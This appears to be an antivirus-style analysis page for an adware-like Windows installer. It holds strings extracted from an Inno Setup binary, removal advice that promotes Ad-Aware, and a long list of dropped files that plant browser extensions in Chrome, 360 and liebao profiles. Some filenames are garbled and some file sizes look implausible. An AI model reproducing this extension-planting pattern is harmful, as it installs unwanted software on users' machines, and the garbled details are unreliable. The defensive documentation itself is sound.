QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
FormKeyDown
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s
PasswordCheckHash
Expression error '%s'
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
srcexe
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_RegDLL.tmp
REGDLL_EXE
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
%d.%d
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
CheckPassword
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.4.2.ee2 (a)
Original Setup EXE:
Windows NT
Windows
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.4.2 (a)
Portions Copyright (C) 2000-2011 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Email:[email protected]
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
Need to restart Windows? %s
Will not restart Windows automatically.
System\CurrentControlSet\Control\Windows
PasswordPage
PasswordLabel8
PasswordEdit<
PasswordEditLabel@
Could not find page with ID %d
PrepareToInstall failed: %s
/:*?"<>|
\/:*?"<>|
TOutputMsgWizardPage
TOutputMsgWizardPagel
TOutputMsgMemoWizardPage
TOutputMsgMemoWizardPage
Cannot assign a %s to a %s
Date exceeds maximum of %s
Date is less than minimum of %s
System Error. Code: %d.
PasswordLabel
PasswordEdit
PasswordEditLabel
MsgLabel
Msg1Label
Msg2Label
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
- Delete the original Dropped file.
- Delete or disinfect the following files created/modified by the Dropped:
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G0623_s_80314.exe (19594639 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Program Files%\jstm\install_1410999454.tmp (6319 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ptc (9 bytes)
%Program Files%\jstm\juese.exe (12289 bytes)
%Documents and Settings%\All Users\Desktop\ç»Â色åâ€Âé—¨.lnk (587 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Almanac_clnh_2014.8.3._126cl[1].exe (1947589 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OfficeAssist.0195.80.1015.exe (2265057 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\ext[1].7z (106408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\OfficeAssist.0195.80.1015[1].exe (2265057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\F0916_s_30897[1].exe (9843602 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\G0623_s_80314[1].exe (19594639 bytes)
%Program Files%\jstm\unist.exe (1624 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Preferences (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (94 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ç»Â色åâ€Âé—¨\ç»Â色åâ€Âé—¨.lnk (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\All Users\Start Menu\ç»Â色åâ€Âé—¨.lnk (587 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F0916_s_30897.exe (9843602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (93 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ç»Â色åâ€Âé—¨.lnk (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\jstm\config.ini (379 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\v6svc.dll (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\oem.ini (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\OfficeAssist.0195.80.1015.exe (37179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\demo.ppt (1644 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\3.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\6.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_fg.png (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\updateself.exe (2128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\2.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist.dll (7748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\utility\uninst.exe (5951 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\utility\uninst.exe (3361 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\文档美化大师\文档美化大师.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\setup.cfg (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\meihua.exe (2268 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\cfgs\setup.cfg (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\product.xml (334 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\文档美化大师\å¸载.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\31.png (875 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist64.dll (5900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_bg.png (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\assistupdate.exe (9662 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\demo.ppt (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\meihua.exe (673 bytes)
